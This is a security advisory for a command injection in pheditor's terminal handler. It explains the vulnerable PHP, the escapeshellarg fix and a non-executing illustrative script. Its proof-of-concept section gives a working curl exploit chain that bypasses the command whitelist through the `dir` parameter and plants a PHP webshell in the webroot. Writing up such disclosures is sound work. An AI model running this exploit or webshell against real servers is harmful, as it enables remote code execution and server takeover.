# CVE-2026-48030
## Vulnerability Summary
### Summary
An OS Command Injection vulnerability in pheditor's terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the `dir` POST parameter, completely bypassing the TERMINAL_COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.
### Details
The terminal handler in pheditor.php accepts two POST parameters: `command` and `dir`. Shell metacharacters are checked on `$command` only; `$dir` is concatenated into the shell_exec() string without any sanitization.
Vulnerable code (pheditor.php, lines 554-586):
```php
$command = $_POST['command']; // metacharacters checked below
$dir = $_POST['dir'];         // NOT checked: injected verbatim into the shell string
if (strpos($command, '&') !== false ||
    strpos($command, ';') !== false ||
    strpos($command, '||') !== false) {
    die(...); // only guards $command, not $dir
}
$output = shell_exec(
    (empty($dir) ? null : 'cd ' . $dir . ' && ') // $dir lands here unescaped
    . $command . ' && echo \ ; pwd'
);
```
An attacker sends `dir=/tmp; curl attacker.com #`. The semicolon in `$dir` is never checked, so it terminates the `cd` and the injected command runs; the trailing `#` comments out everything the handler appends after it (`&& <command> && echo \ ; pwd`), so the whitelisted `command` is never even executed and the injected command's output is what the handler reads back as the current directory.
Fix: replace `$dir` with `escapeshellarg($dir)` on line 586. That turns the whole value into a single quoted shell word, so `cd` receives it literally (and simply fails for a value like the one above); note that it does not restrict which existing directory a user may change into.
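To make the two code paths concrete, here is an added PHP example. It is not pheditor's own code: it rebuilds the command string exactly as the snippet above does, once unescaped and once with the `escapeshellarg()` fix, and feeds it the page's Step 4 payload without executing anything. The `resolve_dir_or_null()` helper and its `$root` argument are an assumption of this example (a defence-in-depth check, not part of the upstream fix), and `str_starts_with()` assumes PHP 8.

```php
<?php
// Added example, not pheditor's code. Shows how the terminal handler's shell
// string is assembled from $command and $dir, vulnerable form beside fixed form.
// Nothing is executed; the build_* functions only return the string that
// shell_exec() would receive.

// Mirrors the page's metacharacter check, which the handler applies to $command only.
function command_is_blocked(string $command): bool
{
    return strpos($command, '&') !== false
        || strpos($command, ';') !== false
        || strpos($command, '||') !== false;
}

// Vulnerable construction: $dir is concatenated raw, so ';' ends the cd and
// '#' comments out everything appended after it.
function build_command_vulnerable(string $command, string $dir): string
{
    return (empty($dir) ? '' : 'cd ' . $dir . ' && ')
        . $command . ' && echo \ ; pwd';
}

// Fixed construction (escapeshellarg on $dir): the value becomes one
// single-quoted shell word, so ';', '#', '$(...)' and backticks are literal.
function build_command_fixed(string $command, string $dir): string
{
    return (empty($dir) ? '' : 'cd ' . escapeshellarg($dir) . ' && ')
        . $command . ' && echo \ ; pwd';
}

// Hypothetical defence in depth (assumption of this example): only accept an
// existing directory under $root, so a user cannot cd anywhere on the host.
function resolve_dir_or_null(string $dir, string $root): ?string
{
    $real = realpath($dir);
    $rootReal = realpath($root);
    if ($real === false || $rootReal === false || !is_dir($real)) {
        return null; // nonexistent path, or a payload that is not a path at all
    }
    $prefix = rtrim($rootReal, '/') . '/';
    return str_starts_with($real . '/', $prefix) ? $real : null;
}

$cmd = 'ls';
$payload = '/tmp; curl -s https://ifconfig.me #'; // the page's Step 4 dir value

echo "blocked(command): " . var_export(command_is_blocked($cmd), true) . "\n";
// The same check would catch the payload, but the handler never runs it on $dir.
echo "blocked(dir):     " . var_export(command_is_blocked($payload), true) . "\n";
echo "vulnerable: " . build_command_vulnerable($cmd, $payload) . "\n";
echo "fixed:      " . build_command_fixed($cmd, $payload) . "\n";
echo "resolved:   " . var_export(resolve_dir_or_null($payload, '/var/www'), true) . "\n";
echo "resolved:   " . var_export(resolve_dir_or_null('/var/www/html', '/var/www'), true) . "\n";
```

The vulnerable string comes out as `cd /tmp; curl -s https://ifconfig.me # && ls && echo \ ; pwd`: the shell runs `cd /tmp`, then `curl`, and treats the rest of the line as a comment. The fixed string is `cd '/tmp; curl -s https://ifconfig.me #' && ls && echo \ ; pwd`: `cd` fails because no directory has that name, and `&&` short-circuits the rest. The resolver returns `null` for the payload and `/var/www/html` for the real directory (on a host where it exists).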
### PoC
Requirements: valid credentials, terminal permission enabled (default)
Step 1: Authenticate
```bash
curl -c cookies.txt -X POST http://TARGET/pheditor.php \
-d "pheditor_password=admin" -L > /dev/null
```
Step 2: Get CSRF token
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
```
Step 3: Confirm curl is blocked via the command field
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=curl https://ifconfig.me" \
--data-urlencode "dir=/tmp"
# → {"error":true,"message":"Command not allowed"}
```
Step 4: Bypass the whitelist via dir injection (the token is re-fetched because it changes between requests)
```bash
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php | \
grep -o 'token = "[a-f0-9]*"' | \
grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
# → {"error":false,"message":"OK","dir":"<PUBLIC_IP>"}
```
Step 5: Full RCE via webshell (the `$` and inner `"` are escaped so the local bash passes `$_GET["c"]` through literally; the remote shell then leaves it alone because it sits inside single quotes)
```bash
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php \
--data-urlencode "action=terminal" \
--data-urlencode "token=$TOKEN" \
--data-urlencode "command=ls" \
--data-urlencode "dir=/var/www/html; echo '<?php system(\$_GET[\"c\"]);?>' > /var/www/html/shell.php #"
curl "http://TARGET/shell.php?c=id"
# → uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Impact
OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (the default configuration) can:
- Execute arbitrary OS commands as the web server user
- Bypass the TERMINAL_COMMANDS whitelist entirely
- Deploy persistent PHP webshells to the webroot
- Read, write, or delete any file accessible to the web server
- Potentially compromise other applications on the same server
### CVSS v3.1 Base Metrics
| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | Low |
| User Interaction | None |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | High |